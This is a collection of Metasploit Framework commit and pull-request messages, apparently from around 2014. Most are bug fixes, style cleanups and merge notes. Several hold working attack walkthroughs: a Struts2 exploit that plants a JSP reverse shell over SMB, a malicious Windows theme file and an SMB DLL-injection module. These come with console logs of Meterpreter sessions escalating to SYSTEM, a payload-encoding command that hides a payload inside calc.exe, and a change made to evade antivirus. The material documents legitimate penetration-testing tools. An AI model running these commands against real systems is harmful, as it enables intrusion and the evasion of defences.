Since Ruby 2.1, the respond_to? method is more strict because it does
not check protected methods. So when you use send(), clearly you're
ignoring this type of access control. The patch is meant to preserve
this behavior to avoid potential breakage.
Resolve#4507
See #4400. This should be all of them, except for, of course, the module
that targets Redmine itself.
Note that this also updates the README.md with more current information
as well.
When this exploit gets run against a system that isn't vulnerable
it can hang for a signifigant ammount of time. This change uses the check
method on the exploit to see whether it should proceed. Don't try to exploit
the host if it's not vulnerable.
This fixes an undef method 'payload_exe' error. We broke this when
all modules started using Msf::Exploit::CmdStager as the only source
to get a command stager payload. The problem with that is "payload_exe"
is an accessor in CmdStagerTFTP, not in CmdStager, so when the module
wants to access that, we trigger the undef method error.
To be exact, this is the actual commit that broke it:
7ced5927d8Fix#4246
Fix#4293. Modules should use OperatingSystems::Match::WINDOWS
instead of Msf::OperatingSystems::WINDOWS, because the second
won't match anything anymore.
So I was looking at issue #4162, and on my box I was seeing this
problem of the exploit failing to delete the payload in C:\Windows,
and the error was "Rex::Proto::SMB::Exceptions::NoReply The SMB
server did not reply to our request". I ended up removing the sleep(),
and that got it to function properly again. The box was a Win 7 SP1.
I also tested other Winodws boxes such as Win XP SP3, Windows Server
2008 SP2 and not having the sleep() doesn't seem to break anything.
So I don't even know why someone had to add the sleep() in the first
place.
See the complaint on #4039. This doesn't fix that particular
issue (it's somewhat unrelated), but does solve around
a file parsing problem reported by @void-in
- Rewrite check method
- Declare that v7 is also exploitable (tested and it works)
- Rename to dc_agentlogupload_file_upload to match the other DC module's naming convention
- Add CVE / OSVDB / Full disclosure references
On August 15, shuckins-r7 merged the Metasploit 4.10.0 branch
(staging/electro-release) into master. Rather than merging with
history, he squashed all history into two commits (see
149c3ecc63 and
82760bf5b3).
We want to preserve history (for things like git blame, git log, etc.).
So on August 22, we reverted the commits above (see
19ba7772f3).
This merge commit merges the staging/electro-release branch
(62b81d6814) into master
(48f0743d1b). It ensures that any changes
committed to master since the original squashed merge are retained.
As a side effect, you may see this merge commit in history/blame for the
time period between August 15 and August 22.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAABAgAGBQJT0CeVAAoJEJMMBVMNnmqO/7AP/0CBRHjtgiR9VnFKSQ+iWTQV
iPNMBevn0mpSRq/gpoKCeFBZ6b+YQYrOLXDKVk62VV9LCslkr/P8LW8ul+m+JtB0
mM6V5esUXM1XhgGEyTnTLRx6BR/WQU1RHlb56ae3nZjQlwCuH/5zEmcy5toZxpsY
6HO46zE0GGBoLr/VgyYlfT08bfoQ+ICyJN0H5ixoovCc3iW0K1MNqLMfdani8zBJ
gYJaMysV7XtepumWWQMSC+b/EuertdXXzWDy2bwe0Q3cQXNXzrkPAvtMqucWG+gy
783OLKCPtVoEZiX87xAptkwmVCRdNGPclaWH7YRZDAh1tqBfRQUg72V/TIrOHCP1
/lYO7yp5pBQg+1UNnpH+xI2YePFfYdHpYDNT5FSQGOnQjJg30ll4SqCm7cVmo2h5
BRSYXkPCsQeXGaFarxGERNb8e+qN/WzSrHzY45tQw8mDuhg94tlf3VtDag3FXxhj
zCxd6bu+tdboVm7FERS85T46kxzmeIycZ4p+Sf7d8gXitl2RKbBdKFNDi1gzeK1T
yN7bDl4sL7qtDgZLXjFrnyC8vXyAqIrAgmFr2JywMBRm6TiCGQvgnrs+sScU3RFU
W2tblGbKQq+CwDeC59uQPqxRkm72SMUrKX9448VEQ+9XbKE3TMQ5Q4qCxmnw31Op
aJ0QgKJz8thZgafZc89I
=e1z9
-----END PGP SIGNATURE-----
gpgsig -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAABCgAGBQJT4pb8AAoJEA+Ckxyj7hsHn+8P/3FlEYCmoqQ/JzsVtmP3Yi4Q
gBRva+crY831mCCQXFrPJBvWfmy5HOzVh+Zh7zWF0GQ1WuuMppHfR5ARFVwmiDs3
qwndhXwziDzBnznf0JKSgT5eJsH23s/ots1lyWymKJvPuT6hn6MRAHUawgnNmYR9
ttnawmHvCM9Iha2oz3nmkLcNd+83bdBfEWi5l8AQ7jJxwMC2/8VPpMscVVwXqPzd
CoQugAYZW5VeaEiGio5+19Ix9EPkIDvs6wnfGBtfPfeaOIDZV4XOFoIFUtEeZd5o
olvEpYvdqscy4Qujzn4C++3wX3bUxkIbHTJHgrKmlD83dI7Cu1JH716G+yfLoJo0
pQBWTGeWYKEh6leK/9J5Bo1/tOJ/ylbcbvH0Y0tmdu4icHar6uYe1QBrCB9xIdh1
F+xo4guYnVo616DXJQSwjIye83b5dBxACrfA3bqCnFVFgTM5jXGV1cqiBgs9Dl++
tIDPgUJkCe/bIdQ7PntlGRzxKihHahlxhCa++YaGKqSq7gXie8Rl4qgloIrbfNZ/
z3XsoOLNdbMGO7ip88Zjwq4Khj5WZu7ijfCtXO7GU1UJZL1tJ2yK2ic7ZDLc251Y
8EGMSTG53+6yvZYFtWMZeQzjwD2cpuF04dOmHOKi6KGJJ7KRPhn6gpsbc6U1mbH9
AjGcfOzhhcsY+WAQ7OG+
=Pjob
-----END PGP SIGNATURE-----
Merge tag '2014072301' into staging/electro-release
Conflicts:
Gemfile.lock
modules/post/windows/gather/credentials/gpp.rb
This removes the active flag in the gpp.rb module. According to Lance,
the active flag is no longer used.
* Check for `INVALID_HANDLE_VALUE` when attempting to open the
device, as this is what is returned when the device doesn't exist.
* Make sure that we only run the exploit against tartgets that we
support directly to make sure we don't BSOD machines (such as what
happens with SP1/SP2).
* Add a call to `check` in the exploit code.
* Check for `INVALID_HANDLE_VALUE` when attempting to open the
device, as this is what is returned when the device doesn't exist.
* Make sure that we only run the exploit against tartgets that we
support directly to make sure we don't BSOD machines (such as what
happens with SP1/SP2).
* Add a call to `check` in the exploit code.
This reduces the number of style guide violations from 230ish to 36.
Nearly all of it has to do with errant parameters, element alignment,
and comment blocks.
Obviously, since this was all automatically fixed, some pretty severe
testing should occur before landing this.
I kind of don't like the automatic styling of the arrays for the
references, but maybe I can get used to it. It's open for discussion.
@jhart-r7 please take a look at this as well -- anything jumping out at
you on this that we should be avoiding for Rubocop?
Four modules updated for the weekly release with minor cosmetic fixes.
- [ ] See all affected modules still load.
- [ ] See all affected modules have expected `info`
Note that there are some cases of host-endian left, these
are intentional because they operate on host-local memory
or services.
When in doubt, please use:
```
ri pack
```
Many of these modules uses sock.get() when they meant get_once()
and their HTTP-based checks were broken in some form. The response
to the sock.get() was not being checked against nil, which would
lead to stack traces when the service did not reply (a likely
case given how malformed the HTTP requests were).
1. Added embed-element to work with IE11 (and Firefox). Removed browser-requirements for ActiveX (clsid and method).
2. Added Cache-Control header on SWF-download to avoid AV-detection (no disk caching = no antivirus-analysis :).
Testing performed:
Successfully tested with Adobe Flash Player 13.0.0.182 with IE9, IE10 and IE11 running on Windows 7SP1. (Exploit will trigger on FF29, although sandboxed.)
'hex-all' encoding was previously ignoring slashes.
This pull adds 'hex-noslashes' mode which carries forward the previous functionality, and replaces all existing references to 'hex-all' with 'hex-noslashes' It then adds a replacement 'hex-all' mode, which really encodes *ALL* characters.
Remove checks for specific Tomcat versions, instead checking whether a
stacktrace is returned when requesting
?Class.classLoader.resources.dirContext.cacheObjectMaxSize with invalid
arguments.
Tested against Tomcat 6 and Tomcat 7 with Struts 2.3.16.1
This commit adds an exploit for the Struts2 RCE utilising the Rex
SMBFileServer Protocol support to deploy a JSP shell over SMB.
```
resource (test4.msf)> use exploits/windows/http/struts_http_jspinject
resource (test4.msf)> set VERBOSE true
VERBOSE => true
resource (test4.msf)> set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
resource (test4.msf)> set URI /struts2-blank/example/HelloWorld.action
URI => /struts2-blank/example/HelloWorld.action
resource (test4.msf)> set SHARE share
SHARE => share
resource (test4.msf)> set JSP /example/HelloWorld.jsp
JSP => /example/HelloWorld.jsp
resource (test4.msf)> set SRVHOST 172.31.6.41
SRVHOST => 172.31.6.41
resource (test4.msf)> set RHOST 172.31.6.245
RHOST => 172.31.6.245
resource (test4.msf)> set RPORT 8080
RPORT => 8080
resource (test4.msf)> set LHOST 172.31.6.41
LHOST => 172.31.6.41
resource (test4.msf)> set LPORT 4444
LPORT => 4444
resource (test4.msf)> exploit
[*] Started reverse handler on 172.31.6.41:4444
[*] Generating our malicious jsp...
[*] About to start SMB Server on: \\172.31.6.41\share for
/example/HelloWorld.jsp
[*] Starting SMB Server on 172.31.6.41:445
[*] Injecting JSP to 172.31.6.245:8080 -
/struts2-blank/example/HelloWorld.action?Class.classLoader.resources.dirContext.docBase=//172.31.6.41/share
[*] 172.31.6.245:8080 - JSP payload uploaded successfully
[*] Command shell session 1 opened (172.31.6.41:4444 ->
172.31.6.245:1146) at 2014-05-01 12:09:25 +0100
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Apache Software Foundation\apache-tomcat-7.0.53\bin>
```
1. Install Tomcat 7.0.53
2. Download and unpack Struts 2.3.16.1 (http://www.mirrorservice.org/sites/ftp.apache.org//struts/binaries/struts-2.3.16.1-all.zip)
3. Deploy struts-2.3.16.1/apps/struts2-blank.war through Tomcat Manager interface
4. use exploits/windows/http/struts_http_jspinject
5. set PAYLOAD java/jsp_shell_reverse_tcp
6. set URI /struts2-blank/example/HelloWorld.action
7. set SHARE share
8. set JSP /example/HelloWorld.jsp
9. set SRVHOST
10. set RHOST
11. set RPORT 8080
12. set LHOST
13. set LPORT 4444
14. exploit
15. Enjoy shells
- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/http/struts_http_jspinject
Tomcat 7.0.53 & Struts 2.3.16.1
This commit refactors the ms13_071_theme module written by @jvazques-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.
```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells
- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file
* Windows XP SP3
This is an implementation of using the SMBFileServer mixin to perform
DLL injection over SMB.
Exploitation can be performed by starting the dllinjector exploit
which will remain resident until a DLL is downloaded and a session
created. By generating an executable using the windows/loadlibrary
payload it is possible to test the SMBServer mixin on various platforms,
but also serves as a novel injection method where LoadLibrary calls are
not being filtered by Antivirus or EMET.
Example Run
```
# msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp SHARE=share DLL=exploit.dll LHOST=172.32.255.1 LPORT=4444 SRVHOST=172.32.255.1 E
[*] Initializing modules...
PAYLOAD => windows/meterpreter/reverse_tcp
SHARE => share
DLL => exploit.dll
LHOST => 172.32.255.1
LPORT => 4444
SRVHOST => 172.32.255.1
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious dll...
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.dll
[*] Sending stage (769536 bytes) to 172.32.255.128
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.128:1186) at 2014-04-24 11:18:55 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Reproduction Steps
* Generate dllinjector executable (non-malicious)
```
msfpayload windows/loadlibrary DLL="\\\\1.2.3.4\\share\\exploit.dll" R | msfencode -b '\x00' -t exe -x calc.exe -k -o dllinjector.exe -e x86/shikata_ga_nai -c 3
```
* Run DLL Injection server
```
msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=4444 SRVHOST=1.2.3.4 SHARE=share DLL=exploit.dll E
```
* Execute dllinjector.exe on the target host
* Monitor the generated traffic in Wireshark
* Enjoy shells.
Verification
Land #3074
Land #3075
Generate loadlibrary executable
Load dllinjector with payload
Run executable on target
Tested on:
Windows 7 (x86/x64)
Windows Server 2003
Windows Server 2008
Meatballs
sinn3r
jvazquez-r7
Gabor Seljan
Matthew Hall
Jon Cave
Tod Beardsley
David Maloney
Sean Verity
HD Moore
Christian Mehlmauer
Jon Hart
William Vu
spdfire
Rich Lundeen
Spencer McIntyre
URI Assassin
Pedro Ribeiro
Jay Smith
James Lee
mfadzilr
nnam
Brandon Turner
inkrypto
Samuel Huckins
Joshua Smith
OJ
b00stfr3ak
Trevor Rosen
TecR0c
Brendan Coles
Jonas Vestberg
agix
Florian Gaultier
Jeff Jarmoc
kaospunk
JoseMi
Ken Smith